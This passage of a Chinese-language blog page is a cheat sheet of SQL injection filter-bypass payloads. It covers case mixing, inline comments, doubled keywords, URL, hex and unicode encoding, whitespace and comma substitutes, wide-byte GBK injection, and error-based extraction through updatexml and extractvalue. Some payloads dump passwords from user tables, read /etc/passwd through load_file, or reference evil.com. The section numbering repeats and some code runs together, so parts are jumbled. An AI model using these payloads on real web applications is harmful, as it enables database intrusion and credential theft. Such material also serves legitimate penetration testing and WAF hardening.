<a href="#2-or-and-绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#2-or-and-绕过" class="headerlink" title="2 or and 绕过"></a>2 or and 绕过</h4>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span><span class="operator">=</span><span class="operator">&&</span> <span class="keyword">or</span><span class="operator">=</span><span class="operator">||</span></span><br><span class="line">(<span class="number">1</span>)大小写变形<span class="keyword">Or</span>,<span class="keyword">OR</span>,<span class="keyword">oR</span></span><br><span class="line">(<span class="number">2</span>)编码,hex,urlencode</span><br><span class="line">(<span class="number">3</span>)添加注释<span class="comment">/*or*/</span></span><br><span class="line">(<span class="number">4</span>)利用符号<span class="keyword">and</span><span class="operator">=</span><span class="operator">&&</span><span class="keyword">or</span><span class="operator">=</span><span class="operator">||</span></span><br></pre></td></tr></table></div></figure>
<h4 id="2-大小写绕过" >
<a href="#2-大小写绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#2-大小写绕过" class="headerlink" title="2 大小写绕过"></a>2 大小写绕过</h4>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1+UnIoN/**/SeLeCT</span><br></pre></td></tr></table></div></figure>
<h4 id="3-内联注释绕过" >
<a href="#3-内联注释绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#3-内联注释绕过" class="headerlink" title="3 内联注释绕过"></a>3 内联注释绕过</h4>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()-- -</span><br></pre></td></tr></table></div></figure>
<p>通常情况下,上面的代码可以绕过过滤器。请注意,这里用的是 like 而不是 =</p>
<h4 id="4-双关键字绕过" >
<a href="#4-双关键字绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#4-双关键字绕过" class="headerlink" title="4 双关键字绕过"></a>4 双关键字绕过</h4>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1+UNIunionON+SeLselectECT+1,2,3–</span><br></pre></td></tr></table></div></figure>
<h4 id="5-编码绕过" >
<a href="#5-编码绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#5-编码绕过" class="headerlink" title="5 编码绕过"></a>5 编码绕过</h4>
<p>如URLEncode编码,ASCII,HEX,unicode编码绕过</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">or</span> <span class="number">1</span><span class="operator">=</span><span class="number">1</span>即<span class="operator">%</span><span class="number">6</span>f<span class="operator">%</span><span class="number">72</span><span class="operator">%</span><span class="number">20</span><span class="operator">%</span><span class="number">31</span><span class="operator">%</span><span class="number">3</span>d<span class="operator">%</span><span class="number">31</span>,而Test也可以为<span class="type">CHAR</span>(<span class="number">101</span>)<span class="operator">+</span><span class="type">CHAR</span>(<span class="number">97</span>)<span class="operator">+</span><span class="type">CHAR</span>(<span class="number">115</span>)<span class="operator">+</span><span class="type">CHAR</span>(<span class="number">116</span>)。</span><br><span class="line"></span><br><span class="line">十六进制编码<span class="keyword">SELECT</span>(extractvalue(<span class="number">0x3C613E61646D696E3C2F613E</span>,<span class="number">0x2f61</span>))双重编码绕过</span><br><span class="line"></span><br><span class="line"><span class="keyword">select</span> load_file(<span 
class="string">'0x2f6574632f706173737764'</span>);</span><br><span class="line">python</span><br><span class="line"><span class="operator">>></span><span class="operator">></span> <span class="string">'/etc/passwd'</span>.encode(<span class="string">'hex'</span>)</span><br><span class="line"><span class="string">'2f6574632f706173737764'</span></span><br><span class="line"></span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="operator">%</span><span class="number">252</span>f<span class="operator">%</span><span class="number">252</span>a<span class="operator">*</span><span class="operator">/</span><span class="keyword">UNION</span><span class="operator">%</span><span class="number">252</span>f<span class="operator">%</span><span class="number">252</span>a <span class="operator">/</span><span class="keyword">SELECT</span><span class="operator">%</span><span class="number">252</span>f<span class="operator">%</span><span class="number">252</span>a<span class="operator">*</span><span class="operator">/</span><span class="number">1</span>,<span class="number">2</span>,password<span class="operator">%</span><span class="number">252</span>f<span class="operator">%</span><span class="number">252</span>a<span class="operator">*</span><span class="operator">/</span><span class="keyword">FROM</span><span class="operator">%</span><span class="number">252</span>f<span class="operator">%</span><span class="number">252</span>a<span class="operator">*</span><span class="operator">/</span>Users<span class="comment">--+</span></span><br><span class="line"></span><br><span class="line">一些unicode编码举例: </span><br><span class="line"></span><br><span class="line">单引号:<span class="string">'%u0027 %u02b9 %u02bc%u02c8 %u2032%uff07 %c0%27%c0%a7 %e0%80%a7</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">空白:%u0020 %uff00%c0%20 %c0%a0 %e0%80%a0</span></span><br><span 
class="line"><span class="string"></span></span><br><span class="line"><span class="string">左括号(:%u0028 %uff08%c0%28 %c0%a8%e0%80%a8</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">右括号):%u0029 %uff09%c0%29 %c0%a9%e0%80%a9</span></span><br></pre></td></tr></table></div></figure>
<p><strong>十六进制引号绕过</strong></p>
<p>users 的十六进制字符串是 7573657273,那么最后的 SQL 语句就变为:</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">selectcolumn_namefrominformation_schema.tableswheretable_name<span class="operator">=</span><span class="number">0x7573657273</span></span><br></pre></td></tr></table></div></figure>
<h4 id="6-空格绕过" >
<a href="#6-空格绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#6-空格绕过" class="headerlink" title="6 空格绕过"></a>6 空格绕过</h4>
<p>两个空格代替一个空格,用Tab代替空格</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">%20 +</span><br><span class="line">%09 tab键(水平)</span><br><span class="line">%0a 新建一行</span><br><span class="line">%0b tab键(垂直)</span><br><span class="line">%0c 新建一页</span><br><span class="line">%0d return功能</span><br><span class="line">%a0 空格</span><br><span class="line">/**/</span><br></pre></td></tr></table></div></figure>
<p>括号绕过空格:在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来,而括号的两端可以没有多余的空格。</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select(user())from dual where 1=1 and 2=2;</span><br></pre></td></tr></table></div></figure>
<h4 id="7-逗号绕过" >
<a href="#7-逗号绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#7-逗号绕过" class="headerlink" title="7 逗号绕过"></a>7 逗号绕过</h4>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">在使用盲注的时候,需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用<span class="keyword">from</span> <span class="keyword">to</span>的方式来解决:</span><br><span class="line"></span><br><span class="line"><span class="keyword">select</span> substr(database() <span class="keyword">from</span> <span class="number">1</span> <span class="keyword">for</span> <span class="number">1</span>); # <span class="keyword">for</span> <span class="number">1</span>显示<span class="number">1</span>个字符 <span class="keyword">from</span> <span class="number">1</span>从第一个开始显示</span><br><span class="line"><span class="keyword">select</span> mid(database() <span class="keyword">from</span> <span class="number">1</span> <span class="keyword">for</span> <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">对于limit可以使用<span class="keyword">offset</span>来绕过:</span><br><span class="line"></span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> news limit <span class="number">0</span>,<span class="number">1</span># 等价于下面这条<span 
class="keyword">SQL</span>语句</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> news limit <span class="number">1</span> <span class="keyword">offset</span> <span class="number">0</span></span><br><span class="line"></span><br><span class="line"># <span class="keyword">case</span> <span class="keyword">when</span> <span class="keyword">then</span></span><br><span class="line"><span class="number">1</span> mysql<span class="operator">></span> <span class="keyword">select</span> <span class="keyword">case</span> <span class="keyword">when</span> <span class="number">1</span><span class="operator">=</span><span class="number">1</span> <span class="keyword">then</span> sleep(<span class="number">2</span>) <span class="keyword">else</span> <span class="number">0</span> <span class="keyword">end</span>;</span><br><span class="line"><span class="number">2</span> <span class="operator">+</span><span class="comment">----------------------------------------+</span></span><br><span class="line"><span class="number">3</span> <span class="operator">|</span> <span class="keyword">case</span> <span class="keyword">when</span> <span class="number">1</span><span class="operator">=</span><span class="number">1</span> <span class="keyword">then</span> sleep(<span class="number">2</span>) <span class="keyword">else</span> <span class="number">0</span> <span class="keyword">end</span> <span class="operator">|</span></span><br><span class="line"><span class="number">4</span> <span class="operator">+</span><span class="comment">----------------------------------------+</span></span><br><span class="line"><span class="number">5</span> <span class="operator">|</span> <span class="number">0</span> <span class="operator">|</span></span><br><span class="line"><span class="number">6</span> <span class="operator">+</span><span class="comment">----------------------------------------+</span></span><br><span 
class="line"><span class="number">7</span> <span class="type">row</span> <span class="keyword">in</span> <span class="keyword">set</span> (<span class="number">2.00</span> sec)</span><br><span class="line"></span><br><span class="line"># <span class="keyword">join</span></span><br><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>;</span><br><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> ((<span class="keyword">select</span> <span class="number">1</span>)A <span class="keyword">join</span> (<span class="keyword">select</span> <span class="number">2</span>)B <span class="keyword">join</span> (<span class="keyword">select</span> <span class="number">3</span>)C <span class="keyword">join</span> (<span class="keyword">select</span> <span class="number">4</span>)D);</span><br><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> ((<span class="keyword">select</span> <span class="number">1</span>)A <span class="keyword">join</span> (<span class="keyword">select</span> <span class="number">2</span>)B <span class="keyword">join</span> (<span class="keyword">select</span> <span class="number">3</span>)C <span class="keyword">join</span> (<span class="keyword">select</span> group_concat(<span class="keyword">user</span>(),<span class="string">' '</span>,database(),<span class="string">' '</span>,@<span class="variable">@datadir</span>))D);</span><br></pre></td></tr></table></div></figure>
<h4 id="8-比较符号-尖括号过滤绕过-lt-gt" >
<a href="#8-比较符号-尖括号过滤绕过-lt-gt" class="heading-link"><i class="fas fa-link"></i></a><a href="#8-比较符号-尖括号过滤绕过-lt-gt" class="headerlink" title="8 比较符号-尖括号过滤绕过<>"></a>8 比较符号-尖括号过滤绕过<></h4>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">同样是在使用盲注的时候,在使用二分查找的时候需要使用到比较操作符来进行查找。如果无法使用比较操作符,那么就需要使用到greatest来进行绕过了。</span><br><span class="line"></span><br><span class="line">最常见的一个盲注的<span class="keyword">sql</span>语句:</span><br><span class="line"></span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> ascii(substr(database(),<span class="number">0</span>,<span class="number">1</span>))<span class="operator">></span><span class="number">64</span></span><br><span class="line"></span><br><span class="line">此时如果比较操作符被过滤,上面的盲注语句则无法使用,那么就可以使用greatest来代替比较操作符了。greatest(n1,n2,n3,...)函数返回输入参数(n1,n2,n3,...)的最大值。</span><br><span class="line"></span><br><span class="line">那么上面的这条<span class="keyword">sql</span>语句可以使用greatest变为如下的子句:</span><br><span class="line"></span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> greatest(ascii(substr(database(),<span class="number">0</span>,<span class="number">1</span>)),<span class="number">64</span>)<span class="operator">=</span><span class="number">64</span></span><br></pre></td></tr></table></div></figure>
<h4 id="9-绕过" >
<a href="#9-绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#9-绕过" class="headerlink" title="9 =绕过"></a>9 =绕过</h4>
<p>用 like 绕过 =</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">' or 1 like 1 </span></span><br><span class="line"><span class="string">绕过对“=”,“>”等的过滤</span></span><br></pre></td></tr></table></div></figure>
<h4 id="10-union,select,where等绕过" >
<a href="#10-union,select,where等绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#10-union,select,where等绕过" class="headerlink" title="10 union,select,where等绕过"></a>10 union,select,where等绕过</h4>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">(1)使用注释符绕过:</span><br><span class="line"></span><br><span class="line">常用注释符:</span><br><span class="line"></span><br><span class="line">//,-- , /**/, #, --+, -- -, ;,%00,--a</span><br><span class="line"></span><br><span class="line">用法:</span><br><span class="line"></span><br><span class="line">U/**/NION/**/SE/**/LECT/**/user,pwd from user</span><br><span class="line"></span><br><span class="line">(2)使用大小写绕过:</span><br><span class="line"></span><br><span class="line">id=-1'UnIoN/**/SeLeCT</span><br><span class="line"></span><br><span class="line">(3)内联注释绕过:</span><br><span class="line"></span><br><span class="line">id=-1'/*!UnIoN*/SeLeCT1,2,concat(/*!table_name*/) FrOM/*information_schema*/.tables/*!WHERE*//*!TaBlE_ScHeMa*/like database()#</span><br><span class="line"></span><br><span class="line">## (4) 双关键字绕过:</span><br><span class="line"></span><br><span class="line">id=-1'UNIunionONSeLselectECT1,2,3–-</span><br></pre></td></tr></table></div></figure>
<h4 id="10-通用绕过(编码):" >
<a href="#10-通用绕过(编码):" class="heading-link"><i class="fas fa-link"></i></a><a href="#10-通用绕过(编码):" class="headerlink" title="10.通用绕过(编码):"></a>10.通用绕过(编码):</h4>
<p>如URLEncode编码,ASCII,HEX,unicode编码绕过:</p>
<p>or 1=1 即 %6f%72%20%31%3d%31,而 Test 也可以写为 CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。</p>
<h4 id="11-等价函数绕过" >
<a href="#11-等价函数绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#11-等价函数绕过" class="headerlink" title="11 等价函数绕过"></a>11 等价函数绕过</h4>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">hex()、bin()==>ascii()</span><br><span class="line"></span><br><span class="line">sleep()==>benchmark()</span><br><span class="line"></span><br><span class="line">concat_ws()==>group_concat()</span><br><span class="line"></span><br><span class="line">mid()、substr()==>substring() @@user==>user() @@datadir==>datadir()</span><br><span class="line"></span><br><span class="line">举例:substring()和substr()无法使用时:?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74或者:</span><br><span class="line"></span><br><span class="line">substr((select'password'),1,1)=0x70strcmp(left('password',1),0x69)=1strcmp(left('password',1),0x70)=0strcmp(left('password',1),0x71)=-1</span><br></pre></td></tr></table></div></figure>
<h4 id="12-宽字节绕过" >
<a href="#12-宽字节绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#12-宽字节绕过" class="headerlink" title="12 宽字节绕过"></a>12 宽字节绕过</h4>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">过滤单引号时,可以试试宽字节</span><br><span class="line">%bf%27 %df%27 %aa%27</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">过滤 ' 的时候往往利用的思路是将 ' 转换为 \' 。</span><br><span class="line">在 mysql 中使用 GBK 编码的时候,会认为两个字符为一个汉字,一般有两种思路:</span><br><span class="line"></span><br><span class="line">(1)%df 吃掉 \ 具体的方法是 urlencode('\) = %5c%27,我们在 %5c%27 前面添加 %df ,形成 %df%5c%27 ,而 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字,%df%5c 就是一个汉字,%27 作为一个单独的(')符号在外面:</span><br><span class="line">id=-1%df%27union select 1,user(),3--+</span><br><span class="line"></span><br><span class="line">(2)将 \' 中的 \ 过滤掉,例如可以构造 %**%5c%5c%27 ,后面的 %5c 会被前面的 %5c 注释掉。</span><br><span class="line">一般产生宽字节注入的PHP函数:</span><br><span class="line">1.replace():过滤 ' \ ,将 ' 转化为 \' ,将 \ 转为 \\,将 " 转为 \" 。用思路一。</span><br><span class="line">2.addslashes():返回在预定义字符之前添加反斜杠(\)的字符串。预定义字符:' , " , \ 。用思路一</span><br><span class="line">(防御此漏洞,要将 mysql_query 设置为 binary 的方式)</span><br><span class="line"></span><br><span class="line">3.mysql_real_escape_string():转义下列字符:</span><br><span class="line">\x00 \n \r \'" \x1a</span><br><span class="line">(防御,将mysql设置为gbk即可)</span><br></pre></td></tr></table></div></figure>
<h4 id="万能密钥绕过" >
<a href="#万能密钥绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#万能密钥绕过" class="headerlink" title="* 万能密钥绕过"></a>* 万能密钥绕过</h4>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">用经典的<span class="keyword">or</span> <span class="number">1</span><span class="operator">=</span><span class="number">1</span>判断绕过,如<span class="keyword">or</span> ‘swords’ <span class="operator">=</span>’swords</span><br></pre></td></tr></table></div></figure>
<h4 id="8-号拆解字符串绕过" >
<a href="#8-号拆解字符串绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#8-号拆解字符串绕过" class="headerlink" title="8 +,-,.号拆解字符串绕过"></a>8 +,-,.号拆解字符串绕过</h4>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">' or '</span><span class="number">11</span><span class="operator">+</span><span class="number">11</span><span class="string">'='</span><span class="number">11</span><span class="operator">+</span><span class="number">11</span><span class="string">'</span></span><br><span class="line"><span class="string">"-"和"."</span></span><br></pre></td></tr></table></div></figure>
<h4 id="10-in绕过" >
<a href="#10-in绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#10-in绕过" class="headerlink" title="10 in绕过"></a>10 in绕过</h4>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">or</span> <span class="string">'1'</span> <span class="keyword">IN</span> (<span class="string">'swords'</span>)</span><br></pre></td></tr></table></div></figure>
<h4 id="11-gt" >
<a href="#11-gt" class="heading-link"><i class="fas fa-link"></i></a><a href="#11-gt" class="headerlink" title="11 >,"></a>11 >,</h4>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">or</span> <span class="string">'password'</span> <span class="operator">></span> <span class="string">'pass'</span></span><br><span class="line"><span class="keyword">or</span> <span class="number">1</span><span class="operator"><</span><span class="number">3</span></span><br></pre></td></tr></table></div></figure>
<h4 id="12-等价函数与命令绕过" >
<a href="#12-等价函数与命令绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#12-等价函数与命令绕过" class="headerlink" title="12 等价函数与命令绕过"></a>12 等价函数与命令绕过</h4>
<p>1.函数或变量</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">hex()、bin() <span class="operator">=</span><span class="operator">=</span><span class="operator">></span> ascii()</span><br><span class="line">sleep() <span class="operator">=</span><span class="operator">=</span><span class="operator">></span>benchmark()</span><br><span class="line">concat_ws()<span class="operator">=</span><span class="operator">=</span><span class="operator">></span>group_concat()</span><br><span class="line">mid()、substr() <span class="operator">=</span><span class="operator">=</span><span class="operator">></span> <span class="built_in">substring</span>()</span><br><span class="line">@<span class="variable">@user</span> <span class="operator">=</span><span class="operator">=</span><span class="operator">></span> <span class="keyword">user</span>()</span><br><span class="line">@<span class="variable">@datadir</span> <span class="operator">=</span><span class="operator">=</span><span class="operator">></span> datadir()</span><br><span class="line"></span><br><span class="line">举例:<span class="built_in">substring</span>()和substr()无法使用时:</span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="operator">+</span><span class="keyword">and</span><span class="operator">+</span>ascii(<span class="built_in">lower</span>(mid((<span class="keyword">select</span><span class="operator">+</span>pwd<span class="operator">+</span><span class="keyword">from</span><span class="operator">+</span>users<span 
class="operator">+</span>limit<span class="operator">+</span><span class="number">1</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)))<span class="operator">=</span><span class="number">74</span> </span><br><span class="line">或者:</span><br><span class="line">substr((<span class="keyword">select</span> <span class="string">'password'</span>),<span class="number">1</span>,<span class="number">1</span>) <span class="operator">=</span> <span class="number">0x70</span>strcmp(<span class="keyword">left</span>(<span class="string">'password'</span>,<span class="number">1</span>), <span class="number">0x69</span>) <span class="operator">=</span> <span class="number">1</span>strcmp(<span class="keyword">left</span>(<span class="string">'password'</span>,<span class="number">1</span>), <span class="number">0x70</span>) <span class="operator">=</span> <span class="number">0</span>strcmp(<span class="keyword">left</span>(<span class="string">'password'</span>,<span class="number">1</span>), <span class="number">0x71</span>) <span class="operator">=</span> <span class="number">-1</span></span><br></pre></td></tr></table></div></figure>
<p>2.符号</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span>和<span class="keyword">or</span>有可能不能使用,可以试下<span class="operator">&&</span>和<span class="operator">||</span><span class="operator">=</span>不能使用的情况,可以考虑尝试</span><br></pre></td></tr></table></div></figure>
<p>3.生僻函数</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">MySQL<span class="operator">/</span>PostgreSQL支持XML函数:</span><br><span class="line"><span class="keyword">Select</span> UpdateXML(‘ ’,’<span class="operator">/</span>script<span class="operator">/</span><span class="variable">@x</span><span class="operator">/</span>’,’src<span class="operator">=</span><span class="operator">/</span><span class="operator">/</span>evil.com’); </span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> <span class="number">1</span><span class="operator">=</span>(updatexml(<span class="number">1</span>,concat(<span class="number">0x3a</span>,(<span class="keyword">select</span> <span class="keyword">user</span>())),<span class="number">1</span>))</span><br><span class="line"></span><br><span class="line"><span class="keyword">SELECT</span> xmlelement(name img,xmlattributes(<span class="number">1</span><span class="keyword">as</span> src,<span class="string">'a\l\x65rt(1)'</span><span class="keyword">as</span> \<span class="number">117</span>n\x65rror)); <span class="operator">/</span><span class="operator">/</span>postgresql</span><br><span class="line"></span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> extractvalue(<span class="number">1</span>, concat(<span class="number">0x5c</span>, (<span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables limit <span class="number">1</span>)));<span class="keyword">and</span> <span class="number">1</span><span class="operator">=</span>(updatexml(<span 
class="number">1</span>,concat(<span class="number">0x5c</span>,(<span class="keyword">select</span> <span class="keyword">user</span>()),<span class="number">0x5c</span>),<span class="number">1</span>))<span class="keyword">and</span> extractvalue(<span class="number">1</span>, concat(<span class="number">0x5c</span>, (<span class="keyword">select</span> <span class="keyword">user</span>()),<span class="number">0x5c</span>))</span><br></pre></td></tr></table></div></figure>
<h4 id="13-反引号-绕过" >
<a href="#13-反引号-绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#13-反引号-绕过" class="headerlink" title="13 反引号`绕过"></a>13 反引号`绕过</h4>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> `version()`,可以用来过空格和正则,特殊情况下还可以将其做注释符用</span><br></pre></td></tr></table></div></figure>
<h4 id="14-换行符绕过" >
<a href="#14-换行符绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#14-换行符绕过" class="headerlink" title="14 换行符绕过"></a>14 换行符绕过</h4>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">%</span><span class="number">0</span>a、<span class="operator">%</span><span class="number">0</span>d</span><br></pre></td></tr></table></div></figure>
<h4 id="15-截断绕过" >
<a href="#15-截断绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#15-截断绕过" class="headerlink" title="15 截断绕过"></a>15 截断绕过</h4>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">%</span><span class="number">00</span>,<span class="operator">%</span><span class="number">0</span>A,?,<span class="operator">/</span><span class="number">0</span>,........,<span class="operator">%</span><span class="number">80</span><span class="operator">-</span><span class="operator">%</span><span class="number">99</span></span><br><span class="line">目录字符串,在<span class="keyword">window</span>下<span class="number">256</span>字节、linux下<span class="number">4096</span>字节时会达到最大值,最大值长度之后的字符将被丢弃。</span><br><span class="line">.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>.<span class="operator">/</span>abcabc.<span class="number">.1</span><span class="operator">/</span>abc<span class="operator">/</span>..<span class="operator">/</span><span class="number">1</span><span class="operator">/</span>abc<span class="operator">/</span>..<span class="operator">/</span><span class="number">1</span><span class="operator">/</span>abc</span><br></pre></td></tr></table></div></figure>
<h4 id="17-N绕过" >
<a href="#17-N绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#17-N绕过" class="headerlink" title="17 \N绕过"></a>17 \N绕过</h4>
